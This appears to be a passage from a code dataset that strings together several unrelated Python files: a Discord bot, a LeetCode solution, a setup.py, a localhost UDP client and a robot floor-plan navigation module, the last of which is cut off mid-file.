backend2.log.setLevel(logging.ERROR)\n backend2.exec_statements(parser2.statements)\n\n backend = backend1 & ~backend2\n backend.log.setLevel(logging.ERROR)\n solver = backend.solver\n model = backend.model\n\n assert model, \"Model unsat. 
Test failed\"\n\n        testcase = backend.generate_testcase(\"variable\")\n        testcase = unpack(testcase, 'all')\n        assert(testcase > 15)\n        assert(testcase & 0xffff == 0)\n        assert((testcase & (testcase - 1) == 0))\n        return True\n\nif __name__ == \"__main__\":\n    NegativeCombinationTest.run()\n","sub_path":"tests/functional/negativecombo.py","file_name":"negativecombo.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"322551282","text":"import discord\n\n\n\n\nprefix = '&'\n\nasync def hbt(message):\n\n\tawait message.reply(\"If you are interested in creating some homebrew, just ask your DM! In most cases, they'll work with you to create something that will add to your game experience. Make sure to take a peek at the templates using &template (whatever you're creating)! If the template doesn't exist, don't worry. Just ask your DM for some help.\")\n\nasync def templates(message):\n\n\tcommand = message.content[len(prefix):].split(' ')\n\n\tparameters = command[1:]\n\n\tcommand = command[0]\n\n\ttry:\n\n\t\tif parameters[0].lower() == 'spell':\n\n\t\t\tembed = discord.Embed(name = \"Spell Template\", description = \"What does your spell do?\", color = 0x4f094e)\n\n\t\t\tembed.add_field(name = \"At Higher Levels\", value = \"What does your spell do when cast at a higher level?\", inline = False)\n\n\t\t\tembed.add_field(name = \"Level\", value = \"What is the base level of your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"School\", value = \"What school of magic does your spell belong to?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Casting Time\", value = \"How long does it take to cast your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Range\", value = \"What is the range (n feet) of your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Components\", value = \"What are the required components of your spell?\", inline = True)\n\n\t\t\tembed.add_field(name = \"Duration\", value = \"How long does your spell last?\", inline = True)\n\n\t\t\tembed.set_footer(text = \"Your DM does this part!\")\n\n\t\t\tawait message.reply(embed = embed)\n\n\n\n\n\t\telse:\n\n\t\t\tawait message.reply(\"Looks like you either made a spelling error, or the template doesn't exist.\")\n\n\texcept IndexError:\n\n\t\tawait message.reply('Try the command again with the template you wish to see!')\n","sub_path":"hbt.py","file_name":"hbt.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159177201","text":"class Solution:\n\n    #ac first solution\n    def findMinArrowShots(self, points):\n        \"\"\"\n        :type points: List[List[int]]\n        :rtype: int\n        \"\"\"\n        if not points or len(points) == 0:\n            return 0\n        points = sorted(points, key = lambda x: (x[0], x[1]))\n        terminal = points[0][1]\n        res = 1\n        for i in range(1, len(points)):\n            if terminal < points[i][0]:\n                res += 1\n                terminal = points[i][1]\n            else:\n                terminal = min(points[i][1], terminal)\n        return res\n\n    #second solution\n    def findMinArrowShotsV2(self, points):\n        \"\"\"\n        :type points: List[List[int]]\n        :rtype: int\n        \"\"\"\n        if not points or len(points) == 0:\n            return 0\n        points = sorted(points, key = lambda x : x[1])\n        res, end = 0, float('-inf')\n        for point in points:\n            if point[0] > end:\n                res += 1\n                end = point[1]\n        return res\n\n\n\nif __name__ == '__main__':\n    input = [[10,16], [2,8], [1,6], [7,12]]\n    
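# expected output: 2 (one arrow at x=6 bursts [1,6] and [2,8]; one at x=12 bursts [7,12] and [10,16])\n    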
print(Solution().findMinArrowShotsV2(input))\n\n\n","sub_path":"452MinimumNumberOfArrowsToBurstBalloons/452MinimumNumberOfArrowsToBurstBalloons.py","file_name":"452MinimumNumberOfArrowsToBurstBalloons.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"376991592","text":"from setuptools import setup, find_packages\n\nwith open('README.rst',encoding='UTF-8') as r:\n    readme = r.read()\n\nsetup(\n    name='pgbackup',\n    version='0.1.0',\n    description='Database backups locally or to AWS S3.',\n    long_description = readme,\n    author = 'Warren',\n    author_email = 'warren.argus@curtin.edu.au',\n    install_requires=['boto3'],\n    packages=find_packages('src'),\n    package_dir={'':'src'}, #this is a legacy thing that we do because of the above line\n    entry_points={\n        'console_scripts': [\n            'pgbackup=pgbackup.cli:main',\n        ]\n    }\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"546979015","text":"import socket\nimport sys\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nprint(\"Socket client created successfully!\")\n\nhost = 'localhost'\nport = 5432\nmessage = \"Hello, server.\"\n\ntry:\n\tprint(\"Client: {}\".format(message))\n\ts.sendto(message.encode(), (host, port))\n\n\tdata, server = s.recvfrom(4096)\n\tdata = data.decode()\n\tprint(\"Received from server: {}\".format(data))\nfinally:\n\tprint(\"Client: Closing the connection\")\n\ts.close()","sub_path":"DIO - Python/Python-Seguranca-da-Informacao-DIO/Clientes e Servidor/clienteudp.py","file_name":"clienteudp.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"229357853","text":"import os\n\nfrom foca.foca import foca\n\nfrom cloud_registry.ga4gh.registry.service_info import RegisterServiceInfo\n\n\ndef main():\n    # create app object\n    app = foca(\n        os.path.join(\n            os.path.dirname(__file__),\n            \"config.yaml\",\n        )\n    )\n\n    # register service info\n    with app.app.app_context():\n        service_info = RegisterServiceInfo()\n        service_info.set_service_info_from_config()\n\n    # start app\n    app.run(port=app.port)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"cloud_registry/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"409959006","text":"\nimport time\nimport os, shutil\nimport imutils\n\nimport numpy as np\nimport json\nimport _pickle as pickle\nimport cv2\n#from pyrecord import Record\nfrom skimage.morphology import skeletonize   # needed by adjustCartLocation()\n\nfrom marvinglobal import marvinglobal as mg\n\nimport config\nimport marker\nimport navManager\n\n\nMM_PER_MAP_PIXEL = 20    # each pixel in the map represents a 20x20 mm square\nMAP_HEIGHT = 1000\nMAP_WIDTH = 1000\nCART_RADIUS_MM = 340   # cart representation as circle in the map, footprint of robot\ncartRadiusPix = int(CART_RADIUS_MM / MM_PER_MAP_PIXEL)\n\nCART_WIDTH_MAP = round(440 / MM_PER_MAP_PIXEL)\nCART_LENGTH_MAP = round(600 / MM_PER_MAP_PIXEL)\n\nSCAN_LOCATION_MARKER_SHADE = 150\n\n\n\n\ndef clearFloorPlan():\n\n    config.floorPlan = np.zeros((MAP_HEIGHT, MAP_WIDTH), dtype=np.uint8)\n    config.floorPlanFat = np.zeros_like(config.floorPlan)\n\n    config.room = \"unknown\"\n    config.fullScanDone = False\n    saveMapInfo()\n\n    config.scanLocations = []\n    saveScanLocations()\n\n\n    
config.markerList = []\n saveMarkerList()\n\n\ndef loadFloorPlan(room):\n \"\"\"\n try to load the floor plan of the last used room\n \"\"\"\n filePath = f\"{config.PATH_ROOM_DATA}/{room}/floorPlan/floorPlan.jpg\"\n if os.path.isfile(filePath):\n config.floorPlan = cv2.imread(filePath, cv2.IMREAD_GRAYSCALE)\n if config.floorPlan is not None:\n config.floorPlanFat = cv2.imread(f\"{config.PATH_ROOM_DATA}/{room}/floorPlan/floorPlanFat.jpg\", cv2.IMREAD_GRAYSCALE)\n\n #cv2.imshow(\"floorPlanFat\", config.floorPlanFat)\n #cv2.waitKey(500)\n #cv2.destroyAllWindows()\n\n if config.floorPlan is None or config.floorPlanFat is None:\n # start with empty plans\n config.floorPlan = np.zeros((MAP_HEIGHT, MAP_WIDTH), dtype=np.uint8)\n config.floorPlanFat = np.zeros((MAP_HEIGHT, MAP_WIDTH), dtype=np.uint8)\n return False\n\n return True\n\n\ndef buildImageName(x, y, yaw=None, pitch=None):\n \"\"\"\n use rounded location and degrees values for imageName to limit number of stored images\n :return: ___\n \"\"\"\n nX = f\"{round(x / 100) * 100:+05d}\"\n nY = f\"{round(y / 100) * 100:+05d}\"\n ndegrees = f\"{round(yaw / 5) * 5:+04d}\" if yaw is not None else \"\"\n nPitch = f\"{pitch:+04d}\" if pitch is not None else \"\"\n return f\"{nX}{nY}{ndegrees}{nPitch}\"\n\n\ndef loadScanLocations():\n\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/scanLocations.json\"\n if os.path.isfile(filename):\n with open(filename, \"r\") as read_file:\n config.scanLocations = json.load(read_file)\n else:\n config.scanLocations = []\n\n\ndef saveScanLocations():\n\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/scanLocations.json\"\n with open(filename, \"w\") as write_file:\n json.dump(config.scanLocations, write_file, indent=2)\n\n\ndef saveMarkerList():\n\n \"\"\"filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.pickle\"\n with open(filename, \"wb\") as write_file:\n for m in config.markerList:\n pickle.dump(m, write_file)\n \"\"\"\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.json\"\n with open(filename, \"w\") as write_file:\n markers = []\n for m in config.markerList:\n markers.append(m.props())\n json.dump(markers, write_file, indent=2)\n\n\n\ndef loadMarkerList():\n\n \"\"\"filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.pickle\"\n if os.path.exists(filename):\n removeFile = False\n with open(filename, \"rb\") as read_file:\n while True: # each marker gets loaded separately\n try:\n thisMarker = pickle.load(read_file)\n config.markerList.append(thisMarker)\n config.log(f\"marker: {thisMarker}\")\n except EOFError:\n break\n except Exception as e:\n removeFile = True\n config.log(f\"error loading markers, remove file\")\n break\n if removeFile:\n os.remove(filename)\n \"\"\"\n filename = f\"{config.PATH_ROOM_DATA}/{config.room}/markerList.json\"\n if os.path.exists(filename):\n with open(filename, \"r\") as read_file:\n markers = json.load(read_file)\n\n for m in markers:\n oMarker = config.cMarker()\n oMarker.markerId = m['markerId']\n oMarker.cameraType = m['cameraType']\n oMarker.cartX = m['cartX']\n oMarker.cartY = m['cartY']\n oMarker.cartDegrees = m['cartDegrees'] # eyecam: head degrees, cartcam\n oMarker.camDegrees = m['camDegrees']\n oMarker.atAngleFromCart = m['atAngleFromCart']\n oMarker.distanceCamToMarker = m['distanceCamToMarker']\n oMarker.markerX = m['markerX']\n oMarker.markerY = m['markerY']\n oMarker.markerDegrees = m['markerDegrees']\n\n config.markerList.append(oMarker)\n config.log(f\"marker: {m}\")\n\n\ndef evalMapLocation(cartX, cartY):\n 
return int((cartX / MM_PER_MAP_PIXEL) + MAP_WIDTH/2), int(MAP_HEIGHT/2 - (cartY / MM_PER_MAP_PIXEL))\n\n\ndef addScanLocation():\n \"\"\"\n add the rounded cart position as scan location\n \"\"\"\n locX = round(config.oCart.getCartX() / 100) * 100\n locY = round(config.oCart.getCartY() / 100) * 100\n loc = (locX, locY)\n\n if not loc in config.scanLocations:\n config.scanLocations.append(loc)\n config.log(f\"new scan location added: {loc}\")\n\n saveScanLocations()\n\n\ndef takeHeadcamImage(show=False):\n\n config.headcamImage = rpcSend.getImage(inmoovGlobal.HEAD_CAM)\n if config.headcamImage is None:\n config.log(f\"WARNING: could not acquire headcam image\")\n return False\n\n if config.headcamImage is not None:\n config.flagProcessHeadcamImage = True\n\n if show:\n cv2.imshow(\"headcam\", config.headcamImage)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return True\n\n\ndef takeEyecamImage(show=False):\n\n config.eyecamImage = rpcSend.getImage(inmoovGlobal.EYE_CAM)\n if config.eyecamImage is None:\n config.log(f\"WARNING: could not acquire eyecam image\")\n return False\n\n if config.eyecamImage is not None:\n config.flagProcessEyecamImage = True\n\n if show:\n cv2.line(config.cartcamImage, (320,0),(320,479),255,2)\n cv2.imshow(\"cartCam\", config.cartcamImage)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return True\n\n\ndef takeCartcamImage(show=False):\n\n #config.cartcamImage = rpcSend.getImage(inmoovGlobal.CART_CAM)\n # [,,,,optional]\n request = {'sender': config.processName, 'cmd': mg.ImageProcessingCommand.CHECK_FOR_ARUCO_CODE, 'cam': mg.CART_CAM, 'markers':[]}\n config.marvinShares.imageProcessingQueue.put(request)\n\n # response by queue\n\n\ndef addCenter(img):\n # draw hair cross at 0,0\n hairCrossColor = (0,255,255)\n cv2.line(img, (495,500), (505, 500), hairCrossColor , 1)\n cv2.line(img, (500, 495), (500, 505), hairCrossColor, 1)\n\n\n\ndef addTarget(img):\n # show target if requested\n targetMapX, targetMapY = evalMapLocation(config.oTarget.getCartX(), config.oTarget.getCartY())\n cv2.circle(img,(targetMapX,targetMapY), 4, config.targetColor, -1)\n\n\ndef addMarker(img, markerX, markerY, markerDegrees):\n mapX, mapY = evalMapLocation(markerX, markerY)\n #config.log(f\"markerMapX: {mapX}, markerMapY: {mapY}, markerDegrees:{markerDegrees}\")\n addArrow(img, mapX, mapY, markerDegrees+90, 600/20, config.markerColor) # cart center 600 mm in front of marker\n baseLength = 10\n baseXCorr = int(baseLength * np.cos(np.radians(markerDegrees)))\n baseYCorr = int(baseLength * np.sin(np.radians(markerDegrees)))\n cv2.line(img,(mapX - baseXCorr, mapY + baseYCorr), (mapX + baseXCorr, mapY - baseYCorr), config.markerColor, 3)\n cv2.line(img,(mapX - baseXCorr, mapY + baseYCorr), (mapX + baseXCorr, mapY - baseYCorr), (0,0,0), 1)\n\n\ndef addPathToTarget(img):\n cartMapX, cartMapY = evalMapLocation(config.oCart.getCartX(), config.oCart.getCartY())\n targetMapX, targetMapY = evalMapLocation(config.oTarget.getCartX(), config.oTarget.getCartY())\n cv2.line(img,(cartMapX, cartMapY), (targetMapX, targetMapY), (0,0,255), 4)\n\n\ndef addArrow(img, mapX, mapY, degrees, length, color=(128,128,128)):\n\n arrowXCorr = int(length * np.cos(np.radians(degrees)))\n arrowYCorr = int(length * np.sin(np.radians(degrees)))\n #cv2.circle(img, (mapX,mapY), 3, color, -1)\n cv2.arrowedLine(img, (mapX, mapY),\n (mapX + arrowXCorr, mapY - arrowYCorr), color, 3, tipLength=0.3) # mark cart degrees\n cv2.arrowedLine(img, (mapX, mapY),\n (mapX + arrowXCorr, mapY - arrowYCorr), (0,0,0), 1, tipLength=0.3) # black 
inside\n return img\n\n\ndef addCart(img, cartX, cartY, cartDegrees, cartColor):\n \"\"\"\n img is the map (1000*1000 pix)\n can draw a cart on the map\n :param img:\n :return:\n \"\"\"\n mapX, mapY = evalMapLocation(cartX, cartY)\n\n # overlay cart at position and degrees\n cartImg = np.zeros((CART_WIDTH_MAP+2, CART_LENGTH_MAP+2, 3), dtype = np.uint8)\n cv2.rectangle(cartImg, (0,0),(CART_LENGTH_MAP, CART_WIDTH_MAP), cartColor, 1)\n h,w = cartImg.shape[:2]\n\n # add arrow\n addArrow(cartImg, round(w-14), round(h/2), 0, 10, cartColor)\n\n # make sure image size adjusts to rotated cart size\n #rotated = imutils.rotate_bound(cartImg, -config.oCart.getCartYaw())\n rotated = imutils.rotate_bound(cartImg, -cartDegrees)\n rotH,rotW = rotated.shape[:2]\n\n # add cart to map\n x1 = mapX - round(rotW/2)\n x2 = x1 + rotW\n y1 = mapY - round(rotH/2)\n y2 = y1 + rotH\n img[y1:y2,x1:x2,:] = rotated\n\n #config.log(f\"cartMapX: {mapX}, cartMapY: {mapY}, cartDegrees:{cartDegrees}\")\n\n cv2.circle(img, (mapX,mapY), 5, cartColor)\n #cv2.imshow(\"cart\", img)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n\n\ndef loadMapInfo():\n \"\"\"\n the cartControl task keeps track of position and location. this is necessary because the cart\n can also be moved by directly using the cartControl interface without connection to the navManager\n \"\"\"\n\n # Getting back the map data:\n filename = f\"{config.PATH_ROOM_DATA}/mapInfo.json\"\n if os.path.exists(filename):\n with open(filename, \"r\") as read_file:\n mapInfo = json.load(read_file)\n\n config.room = mapInfo['room']\n config.fullScanDone = mapInfo['fullScanDone']\n\n else:\n config.room = 'unknown'\n config.fullScanDone = False\n saveMapInfo()\n\n #rpcSend.queryCartInfo()\n\n\ndef saveMapInfo():\n # Saving the objects:\n mapInfo = { 'room': config.room, 'fullScanDone': config.fullScanDone }\n filename = f\"{config.PATH_ROOM_DATA}/mapInfo.json\"\n with open(filename, \"w\") as write_file:\n json.dump(mapInfo, write_file, indent=2)\n\n\n\ndef rotateImage(img, rotation):\n cols, rows = img.shape[:2]\n M = cv2.getRotationMatrix2D((cols/2,rows/2), rotation, 1)\n return cv2.warpAffine(img, M, (cols,rows))\n\n\ndef cropped(imgA, imgB):\n \"\"\"\n The cropped function returns the relevant part of the 2 images based on white pixels\n In addition it leaves a small black border to allow for small shifting without losing pixels\n :param imgA:\n :param imgB:\n :return:\n \"\"\"\n mask = imgA > 0\n coords = np.argwhere(mask) # Coordinates of non-black pixels.\n iAy0, iAx0 = coords.min(axis=0) # Bounding box of non-black pixels.\n iAy1, iAx1 = coords.max(axis=0) + 1 # slices are exclusive at the top\n\n mask = imgB > 0\n coords = np.argwhere(mask) # Coordinates of non-black pixels.\n iBy0, iBx0 = coords.min(axis=0) # Bounding box of non-black pixels.\n iBy1, iBx1 = coords.max(axis=0) + 1 # slices are exclusive at the top\n\n y0 = min(iAy0, iBy0) - 10\n x0 = min(iAx0, iBx0) - 10\n y1 = max(iAy1, iBy1) + 10\n x1 = max(iAx1, iBx1) + 10\n\n return imgA[y0:y1, x0:x1], imgB[y0:y1, x0:x1], y0, x0 # Get a pointer to the bounding box within colImg\n\n\ndef evalMaxProbeDistance(x, y):\n \"\"\"\n based on the current cart position on the map eval the max distance\n to the map border\n \"\"\"\n n1 = np.linalg.norm(np.array([x, y]))\n n2 = np.linalg.norm(np.array([MAP_HEIGHT - x, y]))\n n3 = np.linalg.norm(np.array([x, MAP_WIDTH - y]))\n n4 = np.linalg.norm(np.array([MAP_HEIGHT - x, MAP_WIDTH - y]))\n\n return int(max(np.array([n1,n2,n3,n4])))\n\n \ndef evalNewPos(x, y, deg, dist):\n xNew 
= int(x + dist * np.cos(np.radians(deg)))\n yNew = int(y - dist * np.sin(np.radians(deg)))\n return (xNew, yNew)\n\n\n\n\ndef findNewScanLocation():\n \"\"\"\n based on the map, the cart size and already visited places try to find another\n position to scan for markers\n\n Be careful with units!\n we have map pixels and mm. from the map we get pixel values, for all Distances\n used for cart movements we use however millimeters\n \"\"\"\n\n #########################################################\n showEval = True\n ##########################################################\n wait = 0\n config.log(f\"start findNewScanLocation\")\n SCAN_DEGREE_STEPS = 5\n numSections = int(360 / SCAN_DEGREE_STEPS)\n obstacleSpot = np.zeros(numSections)\n candidateSpot = np.zeros(numSections)\n checkPosMapX = np.zeros(numSections, dtype=np.uint16)\n checkPosMapY = np.zeros(numSections, dtype=np.uint16)\n\n floorPlanFatCopy = np.copy(config.floorPlanFat)\n '''\n beside the real obstacles we also want to avoid going forth and back between 2 scan positions.\n Block distance/degree positions already scanned and create a virtual obstacle at the recorded scan positions\n Do not include current position in blocking\n '''\n #cv2.imshow(\"floorPlanFatCopy\", floorPlanFatCopy)\n\n for i in range(len(config.scanLocations) - 1):\n mapX = int(config.scanLocations[i][0] / MM_PER_MAP_PIXEL) + 500\n mapY = 500 - int(config.scanLocations[i][1] / MM_PER_MAP_PIXEL)\n cv2.circle(floorPlanFatCopy, (mapX, mapY), cartRadiusPix*2, SCAN_LOCATION_MARKER_SHADE, -1)\n\n '''\n Based on the current cart position define the max distance to the map corners.\n This limits the range we have to look for obstacles\n '''\n mapX, mapY = evalMapLocation(config.oCart.getCartX(), config.oCart.getCartY())\n maxProbeDistance = evalMaxProbeDistance(mapX, mapY)\n \n # in maxProbeDistance range check for obstacle-free cart position\n for mapDistance in range(2*cartRadiusPix, maxProbeDistance, cartRadiusPix):\n\n # for a set of directions check for obstacles\n for loop2 in range(0, len(obstacleSpot)):\n\n # check for direction already blocked\n if obstacleSpot[loop2] > 0:\n continue\n\n # each entry in obstacleDistances is bound to a direction\n # modify direction to get 0 as straight up\n direction = (loop2 * SCAN_DEGREE_STEPS) % 360\n\n # position of obstacle detection with direction and distance off the current location\n checkPosMapX[loop2], checkPosMapY[loop2] = evalNewPos(mapX, mapY, direction, mapDistance)\n\n #print(f\"direction: {direction}, checkPosMap: {checkPosMapX,checkPosMapY}\")\n\n spotlightSize = int(1.5 * cartRadiusPix)\n \n mask = cv2.circle(np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8),\n (checkPosMapX[loop2], checkPosMapY[loop2]),\n spotlightSize, 255, -1)\n # cv2.imshow(\"mask\", mask)\n\n # for visualization only (ring)\n if showEval:\n mask1 = cv2.circle(np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8), (checkPosMapX[loop2],checkPosMapY[loop2]), spotlightSize, 255)\n merged = floorPlanFatCopy + mask1\n #print(f\"loop2: {loop2}, checkPosMap: {checkPosMapX[loop2], checkPosMapY[loop2]}\")\n\n obst = cv2.bitwise_and(floorPlanFatCopy, mask)\n\n if showEval:\n #print(f\"pixels in mask {np.sum(obst)}\")\n #cv2.imshow(\"obst\", obst)\n cv2.imshow(\"find location\", merged)\n cv2.waitKey(wait)\n wait=1\n #cv2.destroyAllWindows()\n\n # if the bitwise and of map and mask > 50 (ignore single bits) set the distance as obstacleDistance\n # this will only find locations on a direct path\n boolArray = np.asarray(obst)\n whitePixInSpot = 
(boolArray > SCAN_LOCATION_MARKER_SHADE).sum()\n if whitePixInSpot > 50:\n obstacleSpot[loop2] = mapDistance * MM_PER_MAP_PIXEL # this blocks further checks in that direction\n else:\n # check for spot area in previous scan location\n grayPixInSpot = (boolArray == SCAN_LOCATION_MARKER_SHADE).sum()\n if grayPixInSpot < 50:\n # add to candidate if area is not visited yet\n candidateSpot[loop2] = mapDistance * MM_PER_MAP_PIXEL\n\n #navGlobal.log(f\"obstacle at degree: {loop2 * SCAN_DEGREE_STEPS}, mapDistance: {mapDistance * 20}, obst: {np.sum(obst)}\")\n\n\n # find the longest free move, index of farthest candidate spot\n idxCandidate = int(np.argmax(candidateSpot))\n\n mapX, mapY = evalMapLocation(config.oCart.getCartX(), config.oCart.getCartY())\n\n if showEval:\n #config.log(f\"idxCandidate: {idxCandidate}, targetPosMap = {checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]}\")\n target = np.copy(config.floorPlanFat)\n cv2.circle(target, (checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]), 10, 255)\n cv2.line(target, (mapX, mapY), (checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]), 255, 2)\n\n locationId = f\"{checkPosMapX[idxCandidate]:.0f}_{checkPosMapY[idxCandidate]:.0f}\"\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanParts/newScanLoc{locationId}.jpg\", target)\n cv2.imshow(\"find location\", target)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n # idxCandidate is the number of lookup steps to find the farthest corner\n # lookout starts with cart degrees\n targetInMapDegree = idxCandidate * SCAN_DEGREE_STEPS\n\n config.log(f\"idxCandidate: {idxCandidate}, targetPosMap = {checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]}, degrees: {targetInMapDegree}, distance: {obstacleSpot[idxCandidate]}\")\n #cv2.waitKey()\n\n # check for minimal distance for gaining new information\n if obstacleSpot[idxCandidate] < 1500:\n # give up\n config.log(f\"findNewScanLocation, no candidate position found, min. 
distance = 1500\")\n return (0,0)\n else:\n # go partially towards that direction\n \n # try to move close to the border to avoid blocking future positions\n distanceMm = obstacleSpot[idxCandidate] - 500\n\n #cartX, cartY = config.getCartLocation()\n #config.log(f\"new scan location found, degree: {int(targetInMapDegree)}, distance: {int(distanceMm)}, cartX: {cartX}, cartY: {cartY}\")\n config.log(f\"new scan location found, degree: {int(targetInMapDegree)}, \"\n f\"distance: {int(distanceMm)}, \"\n f\"cartX: {config.oCart.getCartX()}, cartY: {config.oCart.getCartY()}\")\n\n # return the candidate angle and distance (absolute map value)\n return (targetInMapDegree, distanceMm)\n\n\ndef rebuildMap():\n\n clearFloorPlan()\n\n directory = \"D:/Projekte/InMoov/navManager/ROOMS/unknown/floorPlan\"\n if os.path.isfile(f\"{directory}/floorPlan.jpg\"):\n os.remove(f\"{directory}/floorPlan.jpg\")\n if os.path.isfile(f\"{directory}/floorPlanFat.jpg\"):\n os.remove(directory + \"/floorPlanFat.jpg\")\n\n for file in os.listdir(directory):\n\n if file.endswith(\".json\"):\n with open(f\"{directory}/{file}\", \"r\") as read_file:\n obstacleList = json.load(read_file)\n depthCamDistances = np.array(obstacleList)\n depthCamDegrees = int(file.split()[1].split(\".\")[0])\n config.log(f\"load partialMap {len(depthCamDistances)} {depthCamDegrees}\")\n config.flagAddPartialMap = True\n\n timeout = time.time() + 5\n while not config.flagAddPartialMapDone and time.time() < timeout:\n time.sleep(0.5)\n if time.time() > timeout:\n config.log(f\"timeout addPartialMapDone\")\n navManager.setTask(\"notask\")\n else:\n continue\n\n\n\ndef adjustCartLocation(showBest=True):\n \"\"\"\n if this is not the first full scan verify the carts position\n When doing a fullScanAtPosition we might end up with a floor plan that is slightly misaligned in relation\n to the existing floor plan\n It looks like the IMU is rather stable and rotating the scan plan for alignment does not help much\n However caused by the carts wheel slippage and the only roughly estimated side moves the cart position\n might be off after a number of moves\n Try to find the best shift (x,y) of the scan plan to match the floor plan\n \"\"\"\n\n config.log(f\"try to align new full scan floor plan with existing plan\")\n\n # use gray image\n if len(config.floorPlanFat.shape) == 3:\n im1Gray = cv2.cvtColor(config.floorPlan, cv2.COLOR_BGR2GRAY)\n else:\n im1Gray = config.floorPlanFat\n if len(config.fullScanPlanFat.shape) == 3:\n im2Gray = cv2.cvtColor(config.fullScanPlanFat, cv2.COLOR_BGR2GRAY)\n else:\n im2Gray = config.fullScanPlanFat\n\n # limit comparison to white area with a black border\n imA, imB, dy, dx = cropped(im1Gray, im2Gray)\n\n x, y = 0,0\n\n im12 = cv2.add(imA, imB)\n\n im12Sum = np.sum(im12) # reference sum to be optimized by rotation and shift of imgB\n #print(im12Sum)\n best = [im12Sum, x, y]\n\n # move new scan plan pixelwise around to find best match with floor plan\n # its currently brute force and does not try to shorten the loops\n for x in range(-15,15):\n imBx = imutils.translate(imB,x,0)\n\n for y in range(-15,15):\n imBxy = imutils.translate(imBx,0,y)\n imABxy = cv2.add(imA,imBxy)\n imABxySum = np.sum(imABxy)\n\n if imABxySum < best[0]:\n best = [imABxySum, x, y]\n imBest = imABxy.copy()\n\n\n # skeletonize the plan and fatten with cart size again\n # TODO find a way to get rid ot the strings attached to the contour\n skeleton = skeletonize(imBest > 100).astype(np.uint8)\n skeleton = cv2.bitwise_and(imBest, imBest, 
mask=skeleton)\n\n    # replace area in floor plan with imBest\n    h,w = imBest.shape\n    im1Gray[dy:dy+h,dx:dx+w] = skeleton\n    config.floorPlan = im1Gray\n\n    kernel7 = np.ones((7,7),np.uint8)\n    skeletonFat = cv2.dilate(skeleton, kernel7, iterations=5)\n    im1Gray[dy:dy+h,dx:dx+w] = skeletonFat\n    config.floorPlanFat = im1Gray\n\n    # persist the floorPlan\n    cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlan.jpg\", config.floorPlan)\n    cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanFat.jpg\", config.floorPlanFat)\n\n    # move fullScanFat by the same offset pixels\n    #imFat = imutils.translate(config.fullScanPlanFat, x, y)\n    #imFat = cv2.add(config.floorPlanFat, imFat)\n    ##cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanFat.jpg\", imFat)\n\n    # use the new map offset to correct the cart location\n    xCorr = best[1] * MM_PER_MAP_PIXEL\n    yCorr = best[2] * MM_PER_MAP_PIXEL\n\n    config.log(f\"update cart position based on full scan, xCorr:{xCorr}, yCorr: {yCorr}\")\n    rpcSend.adjustCartPosition(xCorr, yCorr, 0)\n\n    if showBest:\n        \"\"\"\n        wName = f\"best, {best[1]}, {best[2]}\"\n        cv2.imshow(wName, imBest)\n        cv2.moveWindow(wName, 100,500)\n\n        wName = f\"skeleton\"\n        cv2.imshow(wName, config.floorPlan)\n        cv2.moveWindow(wName, 500,100)\n        \"\"\"\n        wName = f\"dilated\"\n        cv2.imshow(wName, config.floorPlanFat)\n        cv2.moveWindow(wName, 500,500)\n\n        cv2.waitKey(1000)\n        cv2.destroyAllWindows()\n\n\n\ndef fullScanAtPosition(lookForMarkers=None):\n    \"\"\"\n    will start at current cart position and degrees\n    takes with different head rotation/neck angles rgb images and scans them for markers\n    with head rotation angle 0 takes a depth image and creates the obstacle line\n    after a full head scan rotates the cart (around center of cart)\n\n    all eyecam pictures are added to the room folder\n\n    identified markers are added to the marker list\n\n    after full cart rotation try to find another cart position for completing the floor plan (findNewScanLocation)\n    if none found consider room as mapped\n    \"\"\"\n\n    config.log(f\"in fullScanAtPosition\")\n\n    if lookForMarkers is None:  # python issue, a mutable default param lookForMarkers=[] raises an error\n        lookForMarkers = []\n\n    platformImu = config.marvinShares.cartDict.get(mg.SharedDataItem.PLATFORM_IMU)\n    startAngle = platformImu.yaw\n\n    # move InMoov eye cam into capturing pose\n    #requestQueue.put({'cmd': 'setAutoDetach', 'servoName': servoName, 'duration': duration})\n    msg = {'cmd': 'setAutoDetach', 'servoName': 'head.neck', 'duration': 5000}\n    config.marvinShares.skeletonRequestQueue.put(msg)\n\n    # eval number of necessary cart rotations to get a full circle\n    # use the fovH of the 